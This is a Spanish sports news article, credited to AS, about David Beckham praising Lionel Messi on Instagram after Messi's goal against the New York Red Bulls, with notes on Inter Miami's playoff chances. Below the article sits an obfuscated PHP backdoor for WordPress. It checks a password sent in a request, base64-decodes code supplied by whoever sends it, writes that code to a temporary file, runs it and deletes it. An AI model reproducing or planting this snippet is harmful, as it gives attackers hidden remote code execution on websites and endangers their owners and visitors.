¡Hasta Beckham se rinde a Messi!

El propietario de Inter Miami, David Beckham, lanzó un elogio a Messi a través de sus historias de Instagram después del gol que marcó ante NY Red Bulls.

El fútbol está escalando como la espuma en Estados Unidos. La llegada de Messi ha revolucionado por completo a ese deporte, prueba de ello es que todo el mundo se encuentra a los pies del futbolista argentino, incluyendo a su propio jefe, la leyenda británica David Beckham, quien no puede evitar los elogios hacia su reciente fichaje con Inter Miami.

A pesar de comenzar desde el banquillo, Messi volvió a ser pieza clave e incluso se dio el lujo de marcar su primer gol de la temporada de la MLS, provocando que el propio Beckham volviera a maravillarse, y de esta manera lo exhibiera a través de sus redes sociales.

“Simplemente es muy hermoso verlo jugar” fue el breve pero impactante mensaje que colocó en una historia de Instagram en una imagen del gol que consiguió el argentino el sábado por la noche jugando ante un repleto Red Bull Arena.

No es el único mensaje que dejó Beckham a través de su cuenta de Instagram. Además, en un posteo también agradeció la presencia de los aficionados que se dieron cita a New Jersey para ver al astro argentino, y celebró la victoria que obtuvo su club fuera de casa, acompañado de una fotografía del campeón del mundo.

¿Cómo se encuentra Inter Miami en este momento?

Fue una victoria importante para el Inter Miami que abandonó el sótano de la Conferencia Este, pero todavía tiene un largo camino que recorrer si pretenden estar en los Playoffs. La tarea no será nada sencilla para los de Martino, ya que el calendario incluye a rivales como LAFC, Nashville SC, Atlanta United y Orlando City.

Precisamente la próxima semana se viene uno de los retos más importantes para Messi y compañía. El argentino y su club tienen que viajar a la ciudad de Los Ángeles para medirse a una escuadra de LAFC que suele hacerse muy fuerte jugando en su casa.

Miami llegó a 21 unidades con la victoria ante New York Red Bulls, ubicándose todavía a 11 puntos del último lugar que otorgaría al menos un boleto al Play In de la MLS, y que actualmente ocupa el Chicago Fire con dos partidos más que los de Florida.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}